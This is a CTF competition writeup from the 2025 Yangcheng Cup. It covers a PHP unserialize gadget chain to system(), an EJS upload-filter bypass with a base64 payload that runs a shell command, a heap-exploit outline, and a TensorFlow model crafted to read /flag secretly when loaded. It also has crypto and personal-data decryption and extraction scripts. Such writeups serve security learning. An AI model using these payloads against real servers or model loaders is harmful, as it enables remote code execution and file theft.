2025 Yangcheng Cup (羊城杯) Cybersecurity Competition Writeup (ycb wp)
Web
ez_unserialize
[*]Class H: the destructor __destruct() calls $this->who->start(), which is the entry point of the chain.
[*]Class A: start() outputs $this->next; if $this->next is an object, this triggers its __toString() method.
[*]Class V: __toString() evaluates $this->go->{$this->dowhat}; when $dowhat is "secret", this accesses the secret property of class E.
[*]Class E: __get("secret") calls $this->found->check().
[*]Class F: check() verifies that $finalstep does not contain "U"; if the check passes, it instantiates the class named by $finalstep and invokes it, triggering __invoke().
[*]Class U: __invoke() goes through class N's __call() to reach system($this->cmd), giving command execution.
H.__destruct() → A.start() → V.__toString() → E.__get("secret") → F.check() → U.__invoke() → N.__call() → system(cmd)
staticNodeService
The source code is provided. Look at the security middleware part:
app.use((req, res, next) => {
if (typeof req.path !== 'string' ||
(typeof req.query.templ !== 'string' && typeof req.query.templ !== 'undefined')
) res.status(500).send('Error parsing path');
else if (/js$|\.\./i.test(req.path)) res.status(403).send('Denied filename');
else next();
})

This regular expression checks whether the path:
[*]ends with "js" (js$)
[*]contains ".." (a parent-directory reference, i.e. potential path traversal)
[*]the i flag makes the match case-insensitive
If the path matches either pattern, the server returns 403 (Forbidden) with the message "Denied filename".
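To see concretely what this filter blocks, the same pattern can be transcribed into Python (the sample paths below are only illustrative):

import re

# Same check as the middleware: reject paths ending in "js" or containing ".."
denied = re.compile(r"js$|\.\.", re.IGNORECASE)

for p in ["/index.html", "/views/1.ejs", "/../etc/passwd", "/views/1.ejs/."]:
    print(p, "->", "denied" if denied.search(p) else "allowed")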
Now look at the PUT handling logic.
First point: path concatenation.

const filePath = path.join(STATIC_DIR, req.path);

This line joins the static file directory (STATIC_DIR) with the request path (req.path) via path.join() to build the full path of the file to be written.
[*]STATIC_DIR = /var/www/static
[*]req.path = /images/logo.png
After joining:

path.join('/var/www/static', '/images/logo.png')
// result: /var/www/static/images/logo.png

This points to the file images/logo.png under the server's static directory.
Second point: the uploaded content.
fs.writeFile(filePath, Buffer.from(req.body.content, 'base64'), (err) => {
if (err) {
return res.status(500).send('Error writing file');
}
res.status(201).send('File created/updated');
});
[*]Take the content field from the request body (req.body)
[*]Base64-decode it into a Buffer
[*]Write it to the file asynchronously with fs.writeFile()
So we can now write arbitrary files. How do we get them triggered?
// serve index for better viewing
function serveIndex(req, res) {
var templ = req.query.templ || 'index';
var lsPath = path.join(__dirname, req.path);
try {
res.render(templ, {
filenames: fs.readdirSync(lsPath),
path: req.path
});
} catch (e) {
console.log(e);
res.status(500).send('Error rendering page');
}
}
[*]fs.readdirSync(lsPath) synchronously reads all file and directory names under the target directory and returns them as an array
So the plan is clear: first upload an EJS template (bypassing the regex), then have it rendered through the templ parameter.
Step 1: bypass the regex by appending /. to the upload path, e.g. PUT /views/1.ejs/. (the path no longer ends in "js", and path.join() normalizes away the trailing /.).
Step 2: request / and pass the template name in the templ parameter.
After several attempts, the command that prints the flag turns out to be /readflag.
{"content": "PCUtIGdsb2JhbC5wcm9jZXNzLm1haW5Nb2R1bGUucmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKCcvcmVhZGZsYWcnKSAlPg=="}
MISC
成功男人背后的女人
First open it with firework8, which gives:
01000100010000010101001101000011
01010100010001100111101101110111
00110000011011010100010101001110
01011111011000100110010101101000
00110001011011100100010001011111
01001101010001010110111001111101
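Concatenating the six lines and decoding each 8-bit group as ASCII yields the flag. A quick check:

# Join the binary lines above and decode each 8-bit group as an ASCII character
bits = (
    "01000100010000010101001101000011"
    "01010100010001100111101101110111"
    "00110000011011010100010101001110"
    "01011111011000100110010101101000"
    "00110001011011100100010001011111"
    "01001101010001010110111001111101"
)
flag = "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))
print(flag)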
别笑,你试你也过不了第二关
Level 1
a=' # ';b='##### ';c='# #';d='# ##';e=' # # ';f='#####';g=' ### #';h='#####';hilogo=f+f+g+a+h+' '+b+b+f+g+a+h+'\n'+'#'+a+d+a+c+e+a+d+a+c+'\n'+'#'+a+f+'#'+a+c+e+a+f+'#'+a+c+'\n'+'#'+a+d+a+c+e+a+d+a+c+'\n'+f+f+d+'####'+h+h+' '+b+b+f+d+'####'+h+h
Level 2
The 8-character string 'tsnrhtdd' is the "codebook": slicing it with step 4 ([::4]) from four different start positions yields the four possible suffixes:
index: 0 1 2 3 4 5 6 7
char:  t s n r h t d d
Slicing rule: starting at index k, take every 4th character.
k=0 → t+h = th, k=1 → s+t = st, k=2 → n+d = nd, k=3 → r+d = rd.
In short, the start index k selects the suffix: k=0 gives th, k=1 gives st, k=2 gives nd, k=3 gives rd.
The index k is computed as n%5*(condition), which splits into two parts:
[*]Base value: n%5
n%5 maps directly to the "regular" suffix:
n%5=1 → st (k=1), n%5=2 → nd (k=2), n%5=3 → rd (k=3), and n%5=0 or 4 → th (k is either 0 or forced to 0 by the condition). This covers the regular cases.
[*]Switch: n%100^15>4>n%10
This is the "special-case filter", compressed with XOR (^) and a chained comparison; it evaluates to True (1) or False (0):
[*]n%100^15>4: in Python ^ binds tighter than comparisons, so this reads ((n%100)^15) > 4. The XOR result is ≤4 exactly when n%100 is 11-15 (11^15=4, 12^15=3, 13^15=2, 14^15=1, 15^15=0), which is what knocks out the teens;
[*]4>n%10: keeps only last digits 0-3 (the only ones that can need st/nd/rd);
[*]Combined effect: the condition is True only when the last digit is 0-3 and n%100 is not 11-15, so the n%5 value survives exactly for numbers ending in 1, 2 or 3 that are not 11th/12th/13th; otherwise the condition is False, k=0 and th is used, which handles all the special cases (see the sanity check below).
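Putting the two parts together, the expression described above is the classic ordinal-suffix one-liner. A small sanity check (the wrapper function ordinal is just for illustration):

def ordinal(n: int) -> str:
    # 'tsnrhtdd'[k::4] picks th/st/nd/rd depending on the start index k
    return str(n) + "tsnrhtdd"[n % 5 * (n % 100 ^ 15 > 4 > n % 10)::4]

# Spot checks: expect 1st, 2nd, 3rd, 4th, 11th, 12th, 13th, 21st, 111th, 112th
print([ordinal(n) for n in (1, 2, 3, 4, 11, 12, 13, 21, 111, 112)])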
Crypto
瑞德的一生
from sage.all import PolynomialRing, Zmod
from Crypto.Util.number import long_to_bytes
from tqdm import tqdm
# RSA decryption parameter configuration
MODULUS = 7494062703769887703668081866565274579333132167014632821313548612356114287792191446305040778987677683423969025588609780586722302041792065732461222120206217  # modulus N
BASE = 176589407974509728660827257088337183280645510941533692756437851307282715528543669659120503474533510718918949406280646936944629296899342927397139761503564  # base X
ENCRYPTED_DATA = [
    # CIPHERS: the ciphertext list from the challenge attachment (values omitted here)
]
# Initialise the Sage environment
modular_space = Zmod(MODULUS)
poly_ring.<unknown> = PolynomialRing(modular_space)
# Assume the lowest bit of the flag is 1 and compute the initial y^2 value
initial_cipher = ENCRYPTED_DATA[0]
inv_base = pow(BASE, -1, MODULUS)  # inverse of BASE modulo MODULUS
y_squared = (inv_base * initial_cipher) % MODULUS
# Binary bits recovered so far (starting from the lowest bit)
binary_bits = "1"
# Process the remaining ciphertexts
for current_cipher in tqdm(ENCRYPTED_DATA[1:]):
    found = False
    # Try both possible bit values, 0 and 1
    for bit_candidate in [0, 1]:
        # Compute the left-hand-side value
        base_power = pow(BASE, -bit_candidate, MODULUS)
        left_hand_side = (current_cipher * base_power - y_squared) % MODULUS
        # Build the polynomial and look for small roots
        polynomial = (left_hand_side - unknown**2)**2 - 4 * unknown**2 * y_squared
        small_roots = polynomial.small_roots(epsilon=1/20)
        if small_roots:
            if found:
                print("[!] Warning: duplicate match detected")
            # Prepend the recovered bit to the result
            binary_bits = str(bit_candidate) + binary_bits
            found = True
    if not found:
        print("[!] No valid root found for this ciphertext block")
# Output the result
print(f"Recovered binary string: {binary_bits}")
flag_integer = int(binary_bits, 2)
decrypted_flag = long_to_bytes(flag_integer)
print(f"Decrypted flag: {decrypted_flag}")

Run it directly in an online Sage environment (https://cocalc.com/features/sage).
DS&AI
SM4-OFB
import os
import sys
import argparse
import hashlib
import pandas as pd
def hex_to_bytes(hex_str):
return bytes.fromhex(hex_str.strip())
def generate_keystream(cipher_bytes, plaintext_bytes):
    keystream = bytearray(len(cipher_bytes))
    for idx in range(len(cipher_bytes)):
        plain_byte = plaintext_bytes[idx] if idx < len(plaintext_bytes) else 0
        keystream[idx] = cipher_bytes[idx] ^ plain_byte
    return bytes(keystream)
def decrypt(cipher_hex, keystream):
cipher_bytes = hex_to_bytes(cipher_hex)
if len(keystream) < len(cipher_bytes):
keystream_full = (keystream * ((len(cipher_bytes) // len(keystream)) + 1))[:len(cipher_bytes)]
else:
keystream_full = keystream[:len(cipher_bytes)]
    plain_bytes = bytes([cipher_bytes[i] ^ keystream_full[i] for i in range(len(cipher_bytes))]).rstrip(b"\x00")
try:
return plain_bytes.decode("utf-8", errors="replace")
except:
return repr(plain_bytes)
def locate_known_row(dataframe, name, phone, id_card):
for index, row in dataframe.iterrows():
        cell_values = [str(cell) for cell in row.tolist()]
combined = "\t".join(cell_values)
if name in combined and phone in combined and id_card in combined:
return index
return None
def decrypt_and_process():
parser = argparse.ArgumentParser(description="Decrypt personal information sheet with known plaintext.")
parser.add_argument("--input-file", "-i", default="个人信息表.xlsx",
help="Input Excel or CSV file path (default: 个人信息表.xlsx)")
parser.add_argument("--known-name", default="蒋宏玲", help="Known plaintext name (default: 蒋宏玲)")
parser.add_argument("--known-phone", default="17145949399", help="Known plaintext phone number (default: 17145949399)")
parser.add_argument("--known-id", default="220000197309078766",
help="Known plaintext ID card number (default: 220000197309078766)")
parser.add_argument("--target-name", default="何浩璐", help="Target name for ID MD5 calculation (default: 何浩璐)")
parser.add_argument("--output-file", "-o", default="个人信息表_decrypted.csv", help="Output CSV file path")
args = parser.parse_args()
input_path = args.input_file
if not os.path.exists(input_path):
alt_path = "个人信息表_raw.csv"
if os.path.exists(alt_path):
input_path = alt_path
print(f" Input file {args.input_file} not found, using {alt_path} instead.")
else:
print(f" Input file {args.input_file} not found. Please place the file in the current directory.")
sys.exit(1)
if input_path.lower().endswith((".xlsx", ".xls")):
df = pd.read_excel(input_path, header=None, dtype=str)
else:
df = pd.read_csv(input_path, header=None, dtype=str)
    first_row = [str(val) for val in df.iloc[0].fillna("")]
has_header = any("序号" in val or "姓名" in val or "手机号" in val or "身份证" in val for val in first_row)
if has_header:
df = df.copy().reset_index(drop=True)
known_row_idx = locate_known_row(df, args.known_name, args.known_phone, args.known_id)
if known_row_idx is None:
known_row_idx = 1 if len(df) > 1 else 0
print(f" Known plaintext row not detected automatically, using row index {known_row_idx} (0-based).")
else:
print(f" Known plaintext row found at index {known_row_idx} (0-based).")
try:
        name_cipher_hex = str(df.iat[known_row_idx, 1])
        phone_cipher_hex = str(df.iat[known_row_idx, 2])
        id_cipher_hex = str(df.iat[known_row_idx, 3])
except Exception as e:
print(" Failed to read ciphertext columns at indices 1, 2, 3. File structure might be incorrect.", e)
sys.exit(1)
name_keystream = generate_keystream(hex_to_bytes(name_cipher_hex), args.known_name.encode("utf-8"))
phone_keystream = generate_keystream(hex_to_bytes(phone_cipher_hex), args.known_phone.encode("utf-8"))
id_keystream = generate_keystream(hex_to_bytes(id_cipher_hex), args.known_id.encode("utf-8"))
print(f" Keystream lengths: name={len(name_keystream)}, phone={len(phone_keystream)}, id={len(id_keystream)}")
decrypted_rows = []
for row_idx in range(1, len(df)):
        seq = str(df.iat[row_idx, 0]) if pd.notna(df.iat[row_idx, 0]) else str(row_idx)
        try:
            curr_name_hex = str(df.iat[row_idx, 1])
            curr_phone_hex = str(df.iat[row_idx, 2])
            curr_id_hex = str(df.iat[row_idx, 3])
except:
continue
decrypted_name = decrypt(curr_name_hex, name_keystream)
decrypted_phone = decrypt(curr_phone_hex, phone_keystream)
decrypted_id = decrypt(curr_id_hex, id_keystream)
        decrypted_rows.append([seq, decrypted_name, decrypted_phone, decrypted_id])
decrypted_df = pd.DataFrame(decrypted_rows, columns=["序号", "姓名", "手机号", "身份证号"])
decrypted_df.to_csv(args.output_file, index=False)
print(f" Decrypted data saved to {args.output_file}, total rows: {len(decrypted_df)}")
    target_matches = decrypted_df[decrypted_df["姓名"].str.contains(args.target_name, na=False)]
if target_matches.empty:
print(f" No records found for name: {args.target_name}")
else:
for _, record in target_matches.iterrows():
id_card = str(record["身份证号"])
md5_hash = hashlib.md5(id_card.encode("utf-8")).hexdigest()
print(f" Name: {record['姓名']}, ID: {id_card}, MD5: {md5_hash}")
if __name__ == "__main__":
decrypt_and_process()
MD5: fbb80148b75e98b18d65be446f505fcc
dataIdSort
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import csv
def validate_idcard(idcard):
    """Validate a Chinese ID card number"""
    # Handle formats with dashes or spaces
    if '-' in idcard:
        parts = idcard.split('-')
        if len(parts) == 3 and len(parts[0]) == 6 and len(parts[1]) == 8 and len(parts[2]) == 4:
            idcard_clean = ''.join(parts)
        else:
            return False
    elif ' ' in idcard:
        parts = idcard.split()
        if len(parts) == 3 and len(parts[0]) == 6 and len(parts[1]) == 8 and len(parts[2]) == 4:
            idcard_clean = ''.join(parts)
        else:
            return False
    else:
        idcard_clean = idcard
    # 18-digit ID validation
    if len(idcard_clean) == 18:
        weights = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
        check_codes = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']
        if not idcard_clean[:17].isdigit():
            return False
        # Validate the birth date
        try:
            year = int(idcard_clean[6:10])
            month = int(idcard_clean[10:12])
            day = int(idcard_clean[12:14])
            if not (1900 <= year <= 2100 and 1 <= month <= 12 and 1 <= day <= 31):
                return False
        except:
            return False
        # Compute the check digit
        sum_val = sum(int(idcard_clean[i]) * weights[i] for i in range(17))
        check_code = check_codes[sum_val % 11]
        return idcard_clean[-1].upper() == check_code
    # 15-digit ID validation
    elif len(idcard_clean) == 15:
        if not idcard_clean.isdigit():
            return False
        try:
            month = int(idcard_clean[8:10])
            day = int(idcard_clean[10:12])
            if not (1 <= month <= 12 and 1 <= day <= 31):
                return False
        except:
            return False
        return True
    return False
def validate_phone(phone):
    """Validate a Chinese mobile phone number"""
    digits = re.sub(r'[^\d]', '', phone)
    # Handle numbers carrying the 86 country prefix
    if len(digits) == 13 and digits[:2] == '86':
        digits = digits[2:]
    if len(digits) != 11 or digits[0] != '1':
        return False
    # Check the carrier prefix
valid_prefixes = {
'134', '135', '136', '137', '138', '139', '147', '148', '150', '151',
'152', '157', '158', '159', '172', '178', '182', '183', '184', '187',
'188', '195', '198', '130', '131', '132', '140', '145', '146', '155',
'156', '166', '167', '171', '175', '176', '185', '186', '196', '133',
'149', '153', '173', '174', '177', '180', '181', '189', '190', '191',
'193', '199'
}
return digits[:3] in valid_prefixes
def validate_bankcard(card):
    """Validate a bank card number (Luhn algorithm + 62 prefix)"""
    # Only consider cards starting with 62
if not card.startswith('62'):
return False
if not card.isdigit() or len(card) < 16 or len(card) > 19:
return False
    # Luhn checksum
total = 0
reverse_digits = card[::-1]
for i, digit in enumerate(reverse_digits):
n = int(digit)
        if i % 2 == 1:  # every second digit from the right (odd index in the reversed string)
n *= 2
if n > 9:
n -= 9
total += n
return total % 10 == 0
def validate_ip(ip):
    """Validate an IPv4 address"""
parts = ip.split('.')
if len(parts) != 4:
return False
for part in parts:
try:
num = int(part)
if num < 0 or num > 255:
return False
except ValueError:
return False
return True
def validate_mac(mac):
    """Validate a MAC address (xx:xx:xx:xx:xx:xx format)"""
parts = mac.split(':')
if len(parts) != 6:
return False
for part in parts:
if len(part) != 2:
return False
try:
            int(part, 16)  # must parse as hexadecimal
except ValueError:
return False
return True
def extract_sensitive_data(text):
    """Extract sensitive data from text (deduplicated, sorted by position)"""
    results = []
    # Fixed regexes: the $ anchors were removed from the phone patterns to avoid missed matches
    patterns = {
        'phone': [
            r'\+86\s*\d{3}\s+\d{4}\s+\d{4}',        # (+86)132 6239 9600 or +86 132 6239 9600
            r'\+86\s*\d{3}-\d{4}-\d{4}',            # (+86)174-1242-5004 or +86 174-1242-5004
            r'\+86\s*\d{11}',                       # (+86)18227196365 or +86 18227196365
            r'(?<!\d)\d{3}\s+\d{4}\s+\d{4}(?!\d)',  # 157 6118 9206
            r'(?<!\d)\d{3}-\d{4}-\d{4}(?!\d)',      # 181-9714-3686
            r'(?<!\d)\d{11}(?!\d)',                 # 15135915179
        ],
        'idcard': [
            r'(?<!\d)\d{6}-\d{8}-\d{4}(?!\d)',      # 410122-19800821-6567
            r'(?<!\d)\d{6}\s+\d{8}\s+\d{4}(?!\d)',  # 540124 20080916 4682
            r'(?<!\d)\d{18}(?!\d)',                 # 18-digit ID card (all digits)
            r'(?<!\d)\d{17}[Xx](?!\d)',             # 18-digit ID card ending in X
            r'(?<!\d)\d{15}(?!\d)',                 # 15-digit ID card
        ],
        'bankcard': [
            r'(?<!\d)62\d{14,17}(?!\d)',            # 16- to 19-digit card number starting with 62
        ],
        'ip': [
            r'(?<!\d)\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}(?!\d)',  # IPv4 address
        ],
        'mac': [
            r'[0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}',  # MAC address
        ],
    }
    # Extraction order: MAC → IP → phone → ID card → bank card (so short formats are not swallowed by longer ones)
    extract_order = ['mac', 'ip', 'phone', 'idcard', 'bankcard']
    for data_type in extract_order:
        for pattern in patterns[data_type]:
            matches = re.finditer(pattern, text, re.IGNORECASE)  # IGNORECASE for MAC addresses
for match in matches:
value = match.group()
                # Call the matching validation function
if data_type == 'phone' and validate_phone(value):
results.append((data_type, value, match.start(), len(value)))
elif data_type == 'idcard' and validate_idcard(value):
results.append((data_type, value, match.start(), len(value)))
elif data_type == 'bankcard' and validate_bankcard(value):
results.append((data_type, value, match.start(), len(value)))
elif data_type == 'ip' and validate_ip(value):
results.append((data_type, value, match.start(), len(value)))
elif data_type == 'mac' and validate_mac(value):
results.append((data_type, value, match.start(), len(value)))
    # Sort by match position
    results.sort(key=lambda x: x[2])
    # Deduplicate: drop overlapping matches
    unique_results = []
    used_ranges = []  # text ranges already consumed, as (start, end) pairs
for item in results:
data_type, value, start, length = item
end = start + length
        # Check whether this match overlaps a result that was already kept
overlap = False
for used_start, used_end in used_ranges:
if not (end <= used_start or start >= used_end):
overlap = True
break
if not overlap:
unique_results.append((data_type, value))
used_ranges.append((start, end))
return unique_results
def process_file(input_file, output_file):
    """Process the input file, extract sensitive data and save it as CSV"""
    print(f"Processing file: {input_file}")
all_results = []
line_count = 0
    # Read the input file
try:
with open(input_file, 'r', encoding='utf-8') as f:
for line_num, line in enumerate(f, 1):
line_count += 1
                # Print progress every 100 lines
                if line_count % 100 == 0:
                    print(f"Processed {line_count} lines...")
                # Extract sensitive data from the current line
sensitive_data = extract_sensitive_data(line.strip())
for data_type, value in sensitive_data:
all_results.append({
                        'category': data_type,  # "category" column in the CSV
                        'value': value          # "value" column in the CSV
})
        # Count the number of items per category
        type_count = {}
        for item in all_results:
            cat = item['category']
            type_count[cat] = type_count.get(cat, 0) + 1
        # Print processing statistics
        print(f"\nDone: processed {line_count} lines, extracted {len(all_results)} sensitive items")
        print("Per-category counts:")
        for cat, count in sorted(type_count.items()):
            print(f"{cat}: {count} items")
        # Deduplicate on (category, value)
        unique_dict = {}
        for item in all_results:
            key = (item['category'], item['value'])
            if key not in unique_dict:
                unique_dict[key] = item
        unique_results = list(unique_dict.values())
        print(f"After deduplication: {len(unique_results)} unique items")
        # Save as CSV (UTF-8 with BOM so Excel opens it correctly)
        with open(output_file, 'w', encoding='utf-8-sig', newline='') as f:
            # CSV column order: category first, then value
fieldnames = ['category', 'value']
writer = csv.DictWriter(f, fieldnames=fieldnames)
writer.writeheader()
writer.writerows(unique_results)
print(f"结果已保存到:{output_file}")
except FileNotFoundError:
print(f"错误:输入文件 {input_file} 未找到,请检查路径是否正确")
except Exception as e:
print(f"处理过程中发生错误:{str(e)}")
if __name__ == '__main__':
    # Input and output file paths
    INPUT_FILE = "C:\\Users\\26387\\Desktop\\ycb\\dataIdSort的附件\\tempdir\\DS附件\\dataIdSort的附件\\data.txt"  # input text file
    OUTPUT_FILE = 'C:\\Users\\26387\\Desktop\\ycb\\dataIdSort的附件\\tempdir\\DS附件\\dataIdSort的附件\\result5.csv'  # output CSV file
    # Run the extraction
process_file(INPUT_FILE, OUTPUT_FILE)
Pwn
malloc
[*]Use the UAF vulnerability to leak the ELF base address
[*]Corrupt heap metadata to obtain arbitrary-address read/write
[*]Leak the libc base address and a stack address
[*]Build an ORW (Open-Read-Write) chain to read the flag (see the sketch below)
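No exploit script is included for this challenge, so here is only a rough sketch of the last step: assembling an ORW payload with pwntools. The flag path /flag, the buffer size and the delivery of the shellcode are assumptions that depend on the actual binary (a ROP-based chain would follow the same open/read/write pattern).

from pwn import *

context.arch = "amd64"

# open("/flag") -> read(fd, rsp, 0x60) -> write(1, rsp, 0x60)
orw = (
    shellcraft.open("/flag")               # fd is returned in rax
    + shellcraft.read("rax", "rsp", 0x60)  # read the flag onto the stack
    + shellcraft.write(1, "rsp", 0x60)     # write it to stdout
)
shellcode = asm(orw)
print(disasm(shellcode))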
# build_model_tfio.py
# Read /flag inside the graph using pure TensorFlow ops and return it from a signature
# Requires TensorFlow (tensorflow-cpu recommended)
#
# Output: model.zip
import os
import zipfile
try:
    import tensorflow as tf
except Exception as e:
    raise SystemExit("Please install TensorFlow first: pip install tensorflow-cpu\nError: " + str(e))
OUT_DIR = "model_saved"
ZIP_PATH = "model.zip"
# Clean up any previous output
if os.path.exists(OUT_DIR):
import shutil
shutil.rmtree(OUT_DIR)
if os.path.exists(ZIP_PATH):
os.remove(ZIP_PATH)
# Pure-TF serve function: reads /flag inside the graph and returns a tf.Tensor (dtype=tf.string)
@tf.function(input_signature=[tf.TensorSpec(shape=[None], dtype=tf.float32)])
def serve_fn(x):
    # tf.io.read_file is a graph op returning a tf.Tensor (dtype=tf.string, shape=())
    data = tf.io.read_file("/flag")
    # For compatibility with different loaders/callers, either keep the scalar shape or expand it to [batch]:
    # 1) if the caller expects a scalar string: return data directly
    # 2) if the caller sends batched input (shape [batch]), expand data to shape [batch]
    # The example below repeats data to match the input batch size
    batch_size = tf.shape(x)[0]
    data_vec = tf.repeat(tf.expand_dims(data, 0), repeats=batch_size)  # shape [batch]
    # Return a dict; "prediction" is a tf.string tensor of shape [batch]
    return {"prediction": data_vec}
# Fallback pure-TF signature (does not read any file), for testing whether the loader can read the SavedModel at all
@tf.function(input_signature=[tf.TensorSpec(shape=[None], dtype=tf.float32)])
def noop_fn(x):
    batch_size = tf.shape(x)[0]
    const = tf.constant("MODEL_OK", dtype=tf.string)
    vec = tf.repeat(tf.expand_dims(const, 0), repeats=batch_size)
    return {"prediction": vec}
# Save the Module and explicitly register the "serve" signature
class ModelModule(tf.Module):
    @tf.function(input_signature=[tf.TensorSpec(shape=[None], dtype=tf.float32)])
    def __call__(self, x):
        return serve_fn(x)
module = ModelModule()
tf.saved_model.save(module, OUT_DIR, signatures={"serve": serve_fn, "noop": noop_fn})
# Pack the SavedModel into a zip archive
with zipfile.ZipFile(ZIP_PATH, "w", compression=zipfile.ZIP_DEFLATED) as zf:
for root, dirs, files in os.walk(OUT_DIR):
for fname in files:
full = os.path.join(root, fname)
arcname = os.path.relpath(full, OUT_DIR)
zf.write(full, arcname)
print("SavedModel saved to:", OUT_DIR)
print("Zipped to:", ZIP_PATH)